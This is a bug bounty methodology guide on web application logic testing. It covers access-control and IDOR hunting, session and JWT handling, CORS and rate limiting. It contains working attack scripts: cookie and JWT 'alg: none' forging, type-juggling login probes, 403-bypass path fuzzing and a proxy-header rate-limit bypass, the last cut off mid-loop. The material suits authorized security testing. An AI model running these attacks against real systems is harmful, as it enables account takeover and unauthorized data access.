GOAL: Send Unexpected HTTP Requests (Or a Series of Requests) to Cause the Application to Act in an Unexpected Way
When hunting for logic vulnerabilities, your goal as the attacker is to send an HTTP Request (or sequence of requests) that the developers did not plan for. Maybe they forgot to apply an Access Control to a specific endpoint/mechanism. Or maybe they failed to validate that a client should be able to access a larger data set from a single unique identifier. Maybe if you drop a request or two in a complex sequence, the mechanism fails open? All of these are possibilities. If you understand how an application works at a deep level and learn to identify insecure patterns, you can start to "bend" the logic of the application to cause unexpected behavior without actually breaking the app.
- Core Steps:
- Understand the Application on a Deep Level
- Identify Complex & Critical Mechanisms
- Send Unexpected Sequence of Events or Requests
The best programs to do logic testing on are Software-as-a-Service (SaaS) companies that have large, complex web applications. The application must have authentication and should have complex access controls, a wide range of mechanisms/functionality, and be designed to be used by a large number of users simultaneously. Unlike injection testing where you can isolate specific attack vectors, logic testing requires the bug bounty hunter to see the "bigger picture" of how the different components of an application work together. You must first understand how the app works so you can identify the cracks and try to bend/break the logic. Before I begin logic testing a target application, I spend at least 2-3 days understanding how the application works before I do ANY testing. Your mindset should be that you have been hired by this company and are now part of their application security team.
- What language is the back-end written in? - Each server-side language has unique properties that affect the way a bug bounty hunter will approach it. This is especially true for injection testing, but there are several ways the server-side language can affect how the logic of an application executes. Here are a few examples:
- PHP $_SESSION vs $_COOKIE - The handlers PHP uses to access a session token vs. a cookie work in almost the same way, with the main difference being session tokens are stored on the server-side while cookies are stored in the client's browser and can be controlled by an attacker. Imagine a scenario where a new PHP developer intended to set a session token with the user's ID value stored in it. The code should look like this:
<?php session_start(); $_SESSION['user_id'] = 1; echo "Thank you for logging in! Your user ID is: " . $_SESSION['user_id']; ?>
However, if the developer accidentally used a cookie instead, the user can easily modify the user ID value in the cookie and access another user's data:
<?php setcookie('user_id', 1, time() + (86400 * 30)); echo "Thank you for logging in! Your user ID is: " . $_COOKIE['user_id']; ?>
- PHP/Node Loose Comparison - Strict typing languages like Java and C# don't need different comparison operations because the type is already known. For less strict typing languages like PHP and JavaScript, though, there are two different methods to compare variables. The `==` operator compares the value of the variables without considering the type. This means all positive `int` values equal `true`, `"1"` equals `1`, etc. However, the `===` operator also compares the type of each variable, so `"1" === 1` would return `false`. Now consider how this can affect the mechanisms of an application. If a `==` operator is being used to compare a password, can you submit a `true` boolean to force the login mechanism to fail open? (See the sketch below.) Anywhere that user-controlled input is compared to a value stored on the server-side, for PHP or Node applications, there is the possibility of a loose comparison. Java has a similar situation with `==` vs. `.equals()`, but with different implications.
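If you want to probe for loose comparisons from the attacker's side, one low-effort check is to replace string values in a JSON body with booleans, integers, or arrays and watch for behavior changes. A minimal sketch using Python's requests library (the `/user/login` path and field names are placeholders, not a real API):

```python
import requests

# Hypothetical login endpoint -- substitute your target's real path and field names
URL = "https://target.example.com/user/login"

payloads = [
    {"username": "rs0n", "password": "P@s$w0rd!"},  # baseline: valid types, wrong creds
    {"username": "rs0n", "password": True},          # boolean instead of string
    {"username": "rs0n", "password": 1},             # positive int
    {"username": "rs0n", "password": []},            # empty array (type-juggling edge case)
]

for body in payloads:
    r = requests.post(URL, json=body, timeout=10)
    # A status code or response length that differs from the baseline is worth a closer look
    print(body["password"], "->", r.status_code, len(r.content))
```

Anything other than a uniform "invalid credentials" response suggests the comparison (or the framework's type coercion) is doing something the developers did not intend.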
- Is the app using a frontend framework? (React, Angular, NextJS, etc.) - Each of the well-known JavaScript frontend frameworks has its own way of rendering a DOM. React builds a virtual DOM in the client's browser while NextJS renders the DOM on the server-side, encodes it, then decodes and renders it again in the client's browser. These frameworks can have an especially big impact on how Access Controls are implemented. If someone is using React Router, for example, then the access controls are implemented on the client-side. This is very different from how NextJS handles routing. If you're lucky enough to find an application with React on the frontend that has not properly obfuscated the webpack and is using React Router, you can easily download the raw source code and see exactly how the access controls are implemented. This saves a ton of time testing granular access controls.
- What additional client-side NPM Packages are used? - Almost all applications you will target as a bug bounty hunter will have NPM Packages on the client-side acting as APIs to facilitate actions throughout the app. These packages contain JavaScript methods that the developers can use to perform complex operations in the client's browser. Many NPM packages have known vulnerabilities which you can look up on sites like Snyk. Keep in mind that just having a vulnerable version of a package does not mean the application is vulnerable; the developers also need to use the vulnerable method. But don't just consider whether the package has vulnerabilities. Instead, consider how the package works and what problems it solves. This can help inform your logic testing. If you see lodash used, don't just test for Prototype Pollution and move on. Lodash is often used to merge objects, so maybe you can find a way to inject unexpected values into a critical JSON object? That's just one idea...
- Does the app have any custom client-side JavaScript files? - The client-side code in NPM packages is available for any security researcher that would like to test for vulnerabilities. This means using an NPM package can have both a positive and negative effect on your application's security posture. On the positive side, the code has been thoroughly tested, so you can be confident the latest version of the package is secure. However, if you are not using the latest version of the package, attackers can easily identify this and try to exploit known vulnerabilities. With custom JavaScript, the benefits and drawbacks are exactly the opposite. Custom client-side JavaScript has only been tested by the company's internal quality engineers and/or security team. This means it will be harder to find vulnerabilities, but there is a much greater likelihood that you will be able to cause the code to act in a way the developer did not intend. I love to test on applications with large amounts of custom JavaScript. First, try to find flaws in the logic. Check each conditional, for loop, etc. Look anywhere that variables containing user-controlled data are evaluated, especially if there is data related to the client's Identity or Role. Keep in mind that most client-side JavaScript, even custom files, will be minified. Tools like JSNice can help make minified JavaScript readable.
- Is there Authentication? - In my opinion, authentication is a requirement for logic testing. An application without authentication rarely has enough complexity to find impactful logic flaws. With authentication, you open up the possibility for Insecure Direct Object References (IDORs) or Access Control Violations. But it's important to remember that there are many different ways of allowing a user to authenticate. Each of these authentication methods will have a downstream effect on how you will attack the application's logic.
- Username/Password - This is the simplest form of authentication. Behind the scenes, the application stores a unique String (Username) and the hash value of a unique String (Password). When the application needs to prove the client's identity (checking for IDORs), it will either use the Username itself as the unique identifier, or it will use a user ID value as part of the larger User Object. If the application does leverage the Username value as the unique identifier, then you can attempt to break the code pattern that validates the Username to gain access to another user's data. For example, what happens if you register an account with the same Username as another user, but append a unique ASCII Character like a Null Byte to the end? Will you be able to register a unique account (the registration mechanism believes this is a unique String) and access data from the victim user (the client's identity validation believes this is NOT a unique String)? It's definitely worth a shot! (See the sketch below.)
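A quick way to test that idea is to register a username that only differs from the victim's by a trailing control character, then check which account the application resolves it to. A rough sketch, assuming a JSON registration endpoint at `/user/register` (the path and field names are placeholders):

```python
import requests

BASE = "https://target.example.com"
victim = "victim_user"

# Candidate "collisions": same visible username plus a character that some
# code paths may strip or ignore while others treat it as unique
candidates = [victim + "\u0000", victim + " ", victim + "\u00a0", victim.upper()]

for name in candidates:
    r = requests.post(
        f"{BASE}/user/register",
        json={"username": name, "password": "P@s$w0rd!"},
        timeout=10,
    )
    # If registration succeeds, log in with the new account and check whose
    # data the identity-validation code actually returns
    print(repr(name), "->", r.status_code)
```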
- Email/Password - This auth pattern works very similarly to the Username/Password pattern, with the added complexity of the funky way email syntax works. One of my favorite mechanisms to play with while testing this pattern is Plus Addressing. This allows you to create unique user accounts that are tied to the same email address. This could have implications for password reset requests or any other mechanism that requires an email to be sent to the user's address. Email syntax can also make writing regex to validate the username much more complex because it's not just a string, it's a specific syntax pattern. Aim for mechanisms that require the application to parse, compare, or send mail to the email address you registered.
- Single Sign On (SSO) - SSO uses the SAML protocol under the hood, so it's important that you understand how SAML works before considering testing an SSO implementation. Authentication through SSO works a lot like a wristband at a music festival. You purchase a ticket that gives you access to specific shows within the music festival. In return, you are given a wristband that identifies which shows you can see. As long as you have your wristband, you can walk right into any of the shows you have purchased, but if you try to enter a show that your wristband does not give you access to, you will be stopped from going in. SSO in web applications works very much the same way. The user authenticates through a central service like Okta, for example. Once that user authenticates, they will be given an access token that will allow them to automatically log into any application configured for SSO under that user's account. It is important to know that SSO testing can be very difficult for bug bounty hunters because of how SSO needs to be set up. You first need to have access to set up your own SSO implementation, which is not always the case. Even if you can, though, you also need a valid account through an Identity Provider like Okta. This can be an expense for a bug bounty researcher and requires a lot of specific technical knowledge. When testing SSO/SAML, I sort applications into two categories:
- Program allows bug bounty hunters to set up SSO - If the program allows you to set up an SSO integration, you will have access to a valid SAML Request/Response. This opens up several opportunities for researchers to manipulate the SAML Request XML to test for Signature Wrapping Attacks, XXE Attacks, Certificate Faking, Token Recipient Confusion, etc. In my opinion, the best free resource available by far for SAML testing is this blog series by epi. You can also set up your own local SAML Identity Provider test server using a tool like this, and this blog does a great job of showing how to get the test server running locally. One of my favorite ways to find new ideas for attacking protocols like SAML is to look up how to protect it using public resources like the OWASP SAML Cheat Sheet or the SSO Beginners Guide to (mis)configuration. If you know what a secure implementation looks like, you can identify when developers miss these best practices and try to exploit the result.
- Program does NOT allow hunters to set up SSO - Most programs won't allow you to register for SSO, but you can still test the login mechanism itself, especially if the application also allows you to register for an account and uses Email/Password as another option for authentication. Remember that the security of an SSO implementation is entirely dependent on the domain registered to the Identity Provider. Part of the inherent security of SAML comes from the fact that attackers are unable to get a valid email address with the victim organization's domain. However, if you as the "attacker" can register an account outside of SSO that has the same domain as an SSO account, you might be able to bypass some access controls through edge cases in the application logic. Check out reports on Hacktivity like this and this for examples of how this can lead to a valid bug bounty finding.
- OAuth 2.0 - I'm sure I'll mention this several times throughout this doc, but if you see an application that allows you to authenticate using OAuth 2.0, that is already a good sign that you may be able to bend the logic. OAuth is an authorization framework; it was never designed to be used for authentication. I have a section below that goes into great detail on how I test OAuth flows, but for now you should focus on How and Why the application is using OAuth. The most important question I ask myself is, "What Grant Type is the OAuth flow using?" The grant type not only affects how the mechanism works, it has a huge impact on how attackers can cause the mechanism to act in ways the developers did not expect. Once I have identified the grant type, I take special note of all the OAuth Parameters used in the flow. Finally, be sure that you fully understand the Why behind the use of the OAuth mechanism. Is the OAuth flow used simply to identify the client when reading data? If so, this will make IDORs very difficult. Is the OAuth flow used for authorization to different mechanisms in the app? If so, can you modify the scope to bypass existing access controls? What about if the OAuth flow is being used to set up integrations between the APIs of two apps? If so, are there gaps in the scoping that allow you to gain privilege escalation on the third-party app through the integration? These are just some examples, but they show why understanding the Why behind the mechanism is so important.
- What Objects can you enumerate? - If you're not familiar with Object Oriented Programming (OOP), Objects are how developers represent real-world objects in code. A web application uses Objects to group and store data based on what that data is meant to represent. The sensitive data stored in these objects is what you as an attacker are trying to get access to. That's why it's so important to take the time to understand what objects exist in the target application and how they are used. If you're breaking into the Pentagon to steal classified documents, you're not just going to blindly grab every paper you see and hope you find the information you're looking for. If you understand what Objects exist, what data they contain, and how they are accessed, you will greatly increase your chances of finding gaps in the application's security controls. Here are a few examples of Objects you should keep an eye out for, as well as their implications:
- User Object - Typically contains data regarding the identity of a specific user. May contain their password hash, as well, along with a lot of other sensitive information. User Objects are a great target for IDORs; try to get access to another user's object through any READ mechanism.
- Message Object - If the target application has a messaging system, it's very likely that Message Objects exist in the database. There could even be a Message Series Object that contains multiple messages in sequence. Not only can you try to read the private messages of other users, but you can also try to send messages as other users (CREATE) or modify/delete an existing message (UPDATE).
- Bank Account Object - Any object that represents an inherently sensitive "thing" is a great target for bug bounty hunters because it can be easy to show impact simply by getting access to the data. Consider what information stored in the app would have the most impact for users if an attacker exfiltrated that data. Don't just focus on Objects related to authentication and web-based attacks. Try to find the "Nightmare Scenario" for the user first, then make that happen. If you're testing a banking app, exfiltrating the Account and Routing numbers would allow you to execute wire transfers to yourself from that account by simply walking into a Wells Fargo. These are the Objects you should make special note of while you are working to learn the application.
- How is a session established? - Sessions give web applications a way to consistently identify a client between HTTP Requests, specifically because HTTP is not a stateful protocol. Once a user logs in, they will be given a session token that is sent in every subsequent request, allowing the server to quickly identify the logged-in user. This session token will be used as a part of just about every logic attack you execute that involves the user's identity, so it's important to understand exactly how the session token works. Differences in how the session token is built change what attack types are possible. For example, a session token stored in a cookie with no encoded data can't be used as an attack vector for an IDOR. Other session tokens that contain data can possibly be attack vectors for IDORs, Access Control Violations, and even injection attacks. I typically put session tokens into one of the following five categories:
- Cookie -> Unique String - This is the most common and most secure form of session token. There is a unique sequence of characters stored as a cookie that cannot be guessed. In this case, the application is almost certainly using this session to instantiate a User Context Object, making IDORs very difficult. Look through this Session Management Cheat Sheet by OWASP for any missing security flags (`secure`, `httpOnly`, `sameSite`) and check the expiration time for any gaps in best practices, but you will most likely need a Client-Side injection to abuse the session on these.
- Cookie -> Storing Data, No Signature - These session tokens are fantastic for finding hidden attack vectors. If the developers store data in a session token that is not signed and that data is processed by the server-side, that data becomes a fantastic attack vector for a wide range of logic and injection vulnerabilities. The data will likely be encoded, so try some URL and Base64 magic w/ CyberChef or Burpsuite's Decoder (see the sketch below).
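When you suspect a cookie is carrying unsigned, encoded data, it only takes a few lines to decode it, tamper with a field, and re-encode it. A sketch assuming a Base64-encoded JSON blob in a cookie named `session_data` (the cookie name, field names, and target path are assumptions; CyberChef or Burpsuite's Decoder will tell you what encoding you are actually dealing with):

```python
import base64
import json
import requests

URL = "https://target.example.com/user/profile"  # hypothetical endpoint
cookie_value = "eyJ1c2VyX2lkIjogMTMzNywgInJvbGUiOiAidXNlciJ9"  # example captured value

# Decode, inspect, and modify the data the server trusts
data = json.loads(base64.b64decode(cookie_value))
print("Decoded session data:", data)
data["user_id"] = 1           # try another user's ID (IDOR)
data["role"] = "admin"        # or a higher-privileged role (ACV)

tampered = base64.b64encode(json.dumps(data).encode()).decode()
r = requests.get(URL, cookies={"session_data": tampered}, timeout=10)
print(r.status_code, r.text[:200])
```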
- Cookie -> Storing Data w/ Signature - If a session token is storing data and it's signed for integrity, there's not much you can do with it outside of a regular Unique String cookie. However, keep in mind that the developers have to add code to validate that session on every endpoint. It's easy to think that there's no way a developer would miss this, or that if one endpoint validates the session then they all must validate it, but that's simply not the case. Complex applications have a wide range of needs, and it's very difficult for engineers to build an application that has a single piece of code evaluating every request. It's more likely that validating the signature is a middleware or wrapper that is applied to each endpoint, meaning a developer simply needs to forget to apply that library to the endpoint and you've found a new attack vector. They will likely fail to sanitize the data in the session token before it's processed by the server-side code, as well, because they expect it to not be user-controlled. If you can find that, you'll get a few solid bugs!
- Cookie -> JSON Web Token (JWT) - Just like using OAuth 2.0 for authentication, an application using JWTs for session tokens is a good sign for bug bounty hunters on its own. There isn't much difference between testing JWTs and signed cookies with data, except that JWTs have a wide range of known attacks you can use to try and break the JWT validation (see the sketch below). JWTs give bug bounty hunters an opportunity to find highly impactful exploit chains. I always test applications that use JSON Web Tokens for session tokens.
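Before reaching for a dedicated tool, it helps to see what a JWT actually contains; the header and payload are just Base64url-encoded JSON. A minimal sketch that decodes a captured token and rebuilds it with `alg` set to `none` (one of the classic known attacks; whether the forged token is accepted depends entirely on the server's validation library and configuration, and the `user_id` claim name here is an assumption):

```python
import base64
import json

def b64url_decode(part: str) -> bytes:
    # JWT segments are Base64url without padding
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))

def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

# Example token structure: header.payload.signature
token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoxMzM3fQ.sig_removed_for_example"
header_b64, payload_b64, _signature = token.split(".")

header = json.loads(b64url_decode(header_b64))
payload = json.loads(b64url_decode(payload_b64))
print("Header:", header)
print("Payload:", payload)

# Classic 'alg: none' test -- strip the signature and see if the server still accepts it
header["alg"] = "none"
payload["user_id"] = 1  # the claim name is an assumption for illustration
forged = b64url_encode(json.dumps(header).encode()) + "." + \
         b64url_encode(json.dumps(payload).encode()) + "."
print("Forged token:", forged)
```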
- localStorage - Believe it or not, some applications use localStorage to store session tokens in the client's browser. There are several reasons why this is not considered best practice. Most importantly, there is no way to protect these values from client-side injection since you cannot add the `httpOnly` flag. Instead, you will need client-side JavaScript to access and process the token for each request. This is a lot of additional complexity where things can go wrong. In my experience, when applications store session tokens in localStorage, the developers don't seem to realize a user can control those values. As long as the app isn't using known services like Keycloak or Firebase, these are fantastic targets for logic testing.
- What type of Access Controls are Implemented? - Access Controls determine what mechanisms a specific user has access to. Keep in mind that a mechanism is any HTTP Request (or sequence of requests) that executes a CREATE, READ, UPDATE, or DELETE operation on data in the database. Each mechanism should include a block of code that determines whether the user has the authorization required to execute that mechanism. There are different types of access controls, and each type has its own testing methodology for attackers, so it's important to first identify how an application determines whether a user has access to a specific mechanism. Remember that applications can have more than one type of access control, and the more types an app has, the more complexity there is and the better your chance of finding gaps in these controls.
- Role-Based Access Controls (RBAC) - RBAC is the most common form of access controls, and the one most researchers are familiar with. Each user is given a role, for example Admin/Super_User/User, and the role determines what mechanisms the user has access to. When testing RBAC, your goal is to execute a mechanism your role should not be able to execute. Also pay special attention to whether the application uses Hierarchical RBAC, meaning that some roles have inherently more privileges than others. In that case, try to execute mechanisms available to a higher role.
- Discretionary Access Controls (DAC) - DAC is most commonly implemented for things like Projects or Workspaces in an application. For example, someone creates a Kanban Board in Jira so their team can track their work on a single project. The creator of the board sends invites to each team member. Once those users have joined, they have access to the board until it is revoked, and they can invite other users to access the board, up to their level of privileges. DAC is often combined with RBAC, which makes the developer's job even harder.
- Policy-Based Access Controls (PBAC) - PBAC allows developers to build a very granular access control system, giving individual users access to specific mechanisms one by one. This type of access control system is incredibly complex and difficult to build without gaps. Applications with PBAC often have thousands of possible Access Control Violation attack vectors. These are great, great targets for logic testing.
- Is there an API? - An Application Programming Interface (API) is a collection of endpoints in an application that are not designed to be used by humans. A human user accesses and manipulates data through a Graphical User Interface (GUI). The GUI is what you see in your web browser when the DOM is fully loaded; then you can use your keyboard and mouse to execute mechanisms and read/modify data. However, if you were going to write a script to read/modify data, you wouldn't need or want to access the GUI. You would just want a simple way to send an HTTP Request and tell the application to return or modify the data. This is exactly what an API does. For bug bounty hunters, APIs are fantastic targets for all types of testing. APIs can be a way to circumvent access controls, for example if a regular user can create an API key that has Admin privileges. Furthermore, because of the nature of APIs, every API endpoint is also a possible IDOR attack vector. API testing is fairly standardized, but there are some considerations that will affect how you test for logic flaws:
- API First Design? - An app built with an API First Design means that any time data is read, modified, or deleted that operation occurs through an API call. For bug bounty hunters, this is both good and bad. Apps built with this design can be very easy to enumerate. You know where all data manipulation will occur, so you can focus your efforts and quickly rule out several types of attacks. However, applying security controls with an API First Design is much easier since the controls can be standardized across all endpoints. Apps built using this design tend to be hard to break, in my experience.
- Internal or External? - APIs have completely different build requirements based on whether they are designed to be Internal or External. External APIs will likely have static API keys appended as a Header, whereas Internal API endpoints, called through typical use of the application, will likely just send a session token as part of the cookies.
- Documentation? - Most APIs, especially external APIs, will have some type of formal documentation. This can be incredibly helpful for bug bounty hunters because it will show exactly what API endpoints exist, what parameters they take, and what they are designed to do. This is a wealth of information; however, it means everyone else has that knowledge as well. Keep in mind that documentation doesn't always tell the full story. Don't forget to fuzz for hidden endpoints, HTTP Verbs, parameters, etc.
- Is CORS Implemented? - Cross-Origin Resource Sharing (CORS) allows developers to decide what applications can bypass the Same Origin Policy and access their API from another origin. This is most common when a company has multiple applications but wants to pull data from one to another. For example, you have an account under `starbucks.com`. Then you go to `starbucksgiftcard.com` to see all the gift cards you have used in your lifetime. Now `starbucksgiftcard.com` needs to make an API call to `starbucks.com` to get information about your user account, but the browser will prevent that API call because it violates the Same Origin Policy. To solve this, the developers implement CORS on the `starbucks.com` API and allow it to return data from requests containing the `starbucksgiftcard.com` Origin header. Since this can be hardcoded, you probably won't be able to exploit this type of CORS design. However, the problems come when an app needs to allow requests from multiple Origin headers. Since there's no way to tell CORS to allow requests from a list of Origin headers, the developers need to find clever ways to get around this limitation. The best case for you as a bug bounty hunter is when the developers simply reflect the value of the Origin header in the Access-Control-Allow-Origin (ACAO) header. This means no matter what Origin header is sent in the OPTIONS pre-flight, the browser will always allow the request to go through since its own Origin is returned in the response as the ACAO header (see the probe sketch after this list). What is more common but less impactful is the developers attempting to authorize any subdomain of a specific Origin to bypass the Same Origin Policy. If that's the case, try to combine this with a subdomain takeover for a high-impact vulnerability chain.
- Are Websockets used? - Websockets allow developers to establish a stateful connection with a client. Once the connection has been established, websocket requests are sent back and forth without the need to identify the client again. The server trusts that the websocket requests are coming from the same user that connected. For bug bounty hunters, websocket requests are a fantastic place to find additional attack vectors and cause the application to act in unexpected ways. It is also common for developers to think websocket requests are more secure because an attacker can't simply use a tool like Postman to send unexpected user-controlled input, but that assumption is obviously incorrect. Burpsuite makes testing websocket traffic very easy. Remember that websocket requests are just a different way to send user-controlled input; you will still test that input in the same way you would if it came from an HTTP request.
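A quick probe for the reflected-Origin pattern described above is to send the same request with a handful of Origin values and diff the Access-Control-Allow-Origin header that comes back. A sketch (the endpoint is a placeholder; also check whether `Access-Control-Allow-Credentials: true` is returned, since that is what makes reflection exploitable):

```python
import requests

URL = "https://target.example.com/api/v1/me"  # hypothetical authenticated API endpoint

test_origins = [
    "https://evil.example.net",                      # arbitrary origin -- reflection means trouble
    "https://target.example.com.evil.example.net",   # catches sloppy prefix matching
    "https://eviltarget.example.com",                # catches sloppy suffix matching
    "null",                                          # sandboxed-iframe trick
]

for origin in test_origins:
    r = requests.get(URL, headers={"Origin": origin}, timeout=10)
    print(
        origin,
        "-> ACAO:", r.headers.get("Access-Control-Allow-Origin"),
        "| ACAC:", r.headers.get("Access-Control-Allow-Credentials"),
    )
```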
Every HTTP Request can be mapped to a CRUD Operation and specific mechanism in the application. Your goal as a bug bounty hunter is to identify every single mechanism in your target application to give you the greatest chance of finding gaps in their security. Each of these mechanisms is likely a unique target for both Access Control Violation and IDOR testing. Before you begin any logic testing on your target, you should manually go through and identify as many mechanisms as you can. This will help give you a full picture of what options are available to you as an attacker, as well as what mechanisms may have downstream effects on the others. This is the final step I take before actually doing logic testing, and it can take a day or two. Below are some examples of mechanisms with critical functions that you may find.
Think Like QE! How Would You Build Test Scripts?
- POST -> `/user/register` --data `{"username":"rs0n","password":"P@s$w0rd!"}`
- Allows unauthenticated users to create a new account
- IDOR: Not possible, same response to all clients regardless of identity
- ACV: Not possible, this mechanism is available to unauthenticated users
- POST -> `/workspace` --data `{"name":"shared workspace 1"}`
- Allows Admin users to create a new Workspace
- IDOR: Not possible, same response to all clients regardless of identity
- ACV: Possible, only Admins can create new Workspaces, test with all other roles to bypass RBAC
- POST -> `/user/login` --data `{"username":"rs0n","password":"P@s$w0rd!"}`
- Allows users with a valid account to log into the application
- IDOR: Not possible, response depends on input not identity
- ACV: Not possible, this mechanism is available to unauthenticated users
- GET -> `/admin/user/[USER_ID]/search`
- Allows Admin users to look up detailed information about all other users in a specific Workspace
- IDOR: Possible, can the Admin look up user information in a Workspace they do not belong to?
- ACV: Possible, only Admins can access sensitive user information, test with all other roles to bypass RBAC
- POST -> `/user/profile/update/username` --data `{"username":"rs0n_live"}`
- Allows users to change their username
- IDOR: Possible, User ID in JWT Cookie used to identify client. Need to cause JWT validation to fail first.
- ACV: Not possible, this mechanism is available to all users. Unauthenticated users would still need to get an IDOR as part of their ACV.
- UPDATE -> `/workspace/[WORKSPACE_ID]`
- Allows all users with access to a workspace to update the description and other non-critical data points
- IDOR: Possible, can users update these values on workspaces they are not members of?
- ACV: Possible, but basically the same attack as IDOR. Sometimes the lines are a bit blurry between the two.
- POST -> `/user/delete` --data `{"username":"rs0n","password":"P@s$w0rd!","confirm":true}`
- Allows users to delete their account by submitting their valid password and checking a confirmation box
- IDOR: Possible, User ID in JWT Cookie used to identify client. Need to cause JWT validation to fail first.
- ACV: Not possible, this mechanism is available to all users. Unauthenticated users would still need to get an IDOR as part of their ACV.
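Picking up the "Think Like QE" prompt above, a small harness that replays each documented mechanism with session tokens from different roles makes this enumeration repeatable. The endpoints are taken from the examples above; the cookie name, token values, and the concrete user ID are placeholders you would swap in from accounts you control:

```python
import requests

BASE = "https://target.example.com"

# Session tokens from accounts you control, one per role (placeholder values)
SESSIONS = {
    "admin": "ADMIN_SESSION_TOKEN",
    "user": "USER_SESSION_TOKEN",
    "unauth": None,
}

# (method, path, body, roles that SHOULD be allowed) -- based on the notes above
MECHANISMS = [
    ("POST", "/workspace", {"name": "shared workspace 1"}, {"admin"}),
    ("GET", "/admin/user/1001/search", None, {"admin"}),
    ("POST", "/user/profile/update/username", {"username": "rs0n_live"}, {"admin", "user"}),
]

for method, path, body, allowed in MECHANISMS:
    for role, token in SESSIONS.items():
        cookies = {"session": token} if token else {}
        r = requests.request(method, BASE + path, json=body, cookies=cookies, timeout=10)
        # A 2xx for a role that is not in the allowed set is a potential ACV to dig into
        flag = "<-- investigate" if r.ok and role not in allowed else ""
        print(f"{role:7} {method:4} {path:40} {r.status_code} {flag}")
```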
At this point, you should be very familiar with the application, have a ton of notes written about the app, and have identified/documented the majority of the mechanisms. You're finally ready to begin testing! I start by walking through each of the mechanisms to check for IDORs and ACVs. Next, I test any available OAuth flows for misconfigurations that could allow me to steal a valid access token, spoof a valid access token, expand the scope, etc. Finally, I conduct creative testing on the more complex mechanisms that require a long sequence of HTTP Requests to execute. This testing is hard to standardize, but I will do my best to give you tips and examples from bugs I have found.
- Lack of Access Controls - In this case, the developers failed to apply access controls on a specific mechanism. This does not mean that you were able to change the HTTP request to bypass the access controls, that will come later. This is a simple case of a developer forgetting to check if a user is authorized to execute a mechanism. Here are a few examples:
- Unauthenticated -> Authenticated - An unauthenticated user is able to access a web-based tool at `/querytool` that should only allow authenticated users to query a SQL Database running on the local server.
- Role-Based Access Control (RBAC) - A user with the role `Auditor` should only have access to READ mechanisms, but you discover that a user with the `Auditor` role can execute an UPDATE mechanism to modify the data they are auditing.
- Discretionary Access Control (DAC) - A user without access to a Workspace can modify the description of the workspace by sending an `UPDATE` request to `/workspace/[WORKSPACE_ID]/desc`.
- Policy-Based Access Control (PBAC) - A user has not been assigned the policy `project:delete`, which allows them to delete projects they have access to, but you discover that you can delete a project without that policy being applied to your user object.
- In each of these cases, the developers simply forgot to add a check to validate the authorization given to the user. There's nothing fancy here, you just need to walk through each mechanism and check one by one. Notes are mandatory and scripting can be very helpful, but what makes these great targets for bug bounty hunters is how difficult it can be to automate testing for lack of access controls.
- Lack of Rate Limiting - Just like with the previous test, we aren't looking for a way to bypass rate limiting yet. We're simply looking for mechanisms that should have rate limiting but don't. Keep in mind that this can be a grey area on a lot of bug bounty programs, since it can be very hard to show impact with a lack of rate limiting. It's important that you can clearly explain how not having rate limiting on a mechanism could have a significant impact on the application's security posture. For example, if spamming an endpoint causes a security control to fail open, that would be a clear way to show impact.
- Bypass Access Controls - Now that you've gone through each of the mechanisms and identified whether they have access controls applied, you can try to bypass those access controls. To do this, you first need to identify why the server is asserting that you do not have the access required to execute that mechanism. Here are some examples and ways to possibly bypass the control:
- IP Address - Some mechanisms, especially those meant to be internal (and probably very sensitive/critical), are restricted by IP Address. You can attempt to find a Server-Side Request Forgery (SSRF) that would allow you to send a request to the endpoint from an internal IP, but that's not always possible. Another strategy is to try using HTTP Proxy Headers to trick the application into thinking you have a different IP.
- Path Fuzzing - Sending unexpected characters as part of the URL Path. For example, if a GET request to `/admin/login` returns a 403 Response, try changing the path to `/ADMIN/LOGIN` or `/admin//;//login`, just as a few examples. Many more examples can be found here, and there are many great automated tools that test this, for example 403Bypasser for Burpsuite. You can always just use ffuf as well, or just script it yourself.
- Unexpected Access Patterns - The developers have very specific expectations about how a client will access their application. They build their app to be accessed through a web browser with the Fully-Qualified Domain Name (FQDN) over HTTPS. So, as a bug bounty hunter, your goal is to access the app in ways they did NOT expect. Look through the DNS records and try to access the app directly through the IP Address. If there is a CNAME Record, try both domains. If the app is hosted on HTTPS, try accessing endpoints via HTTP on port 80. If the app is using HTTP/2, try downgrading to HTTP/1.1. These all might cause the application's access controls to fail open.
- Hidden Parameters - Try adding parameters like `isAdmin=True` to see if it has any effect. You might get lucky! (See the sketch below for a quick way to script these path and parameter checks.)
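If you'd rather script it yourself than reach for ffuf or 403Bypasser, the sketch below cycles through a few common path mutations and bolt-on parameters against an endpoint that returned 403 for your role. The mutation and parameter lists are just starting points, and the target path is a placeholder:

```python
import requests

BASE = "https://target.example.com"
blocked_path = "/admin/login"   # an endpoint that returned 403 for your role

path_variants = [
    blocked_path,
    blocked_path.upper(),                              # /ADMIN/LOGIN
    blocked_path + "/",
    blocked_path + "/.",
    blocked_path.replace("/admin/", "/admin//;//"),    # /admin//;//login
    "/%2e" + blocked_path,
]

hidden_params = ["", "?isAdmin=True", "?admin=1", "?debug=true"]

for path in path_variants:
    for params in hidden_params:
        r = requests.get(BASE + path + params, timeout=10, allow_redirects=False)
        # Anything that is not the baseline 403 deserves manual review
        if r.status_code != 403:
            print(r.status_code, path + params)
```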
- Bypass Rate Limiting - It's much easier to show impact bypassing an existing rate limit because you know the developers wanted to prevent a large volume of requests coming to this endpoint. Rate limiting is typically done in two ways:
- User Account - If the rate limiting is done by user account, this could allow you to lock out other users as you are testing, so be very careful to only test using account identifiers for users you control. If this is the case, there should be a code pattern where two strings or IDs are compared. Try to modify those values being compared to bypass the rate limiting based on User Account. If you believe it's an ID value being compared, try to perform an UPDATE on your user object to see if that changes the ID value. Ultimately, you need to find what value the server is using to identify you and manipulate the application to change it.
- IP Address - If the server is identifying you by your IP Address (more common and more secure), then your goal is to trick the application into thinking you have a different IP address. They are likely using the value of the remote socket, which is not something an attacker can control without a proxy/VPN, but the same Proxy Headers mentioned above can be used here as well. It's very common that these proxy headers will be appended to the list of IP Addresses assigned to the client. Some code patterns may access the address at the [0] index, while others may take the address at the [-1] index, causing unexpected behavior. If you can control the address being evaluated by a header, you have a bypass that could have significant impact (see the sketch below).
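To test whether the rate limiter trusts a client-supplied address, resend the same request past the limit while rotating the common proxy headers. A sketch (the login endpoint and throttle threshold are placeholders; only run this against accounts you control):

```python
import requests

URL = "https://target.example.com/user/login"
body = {"username": "rs0n", "password": "wrong-password"}

# Headers that reverse proxies commonly use to pass along the client IP
candidate_headers = ["X-Forwarded-For", "X-Real-IP", "X-Originating-IP", "True-Client-IP"]

for header in candidate_headers:
    for i in range(30):
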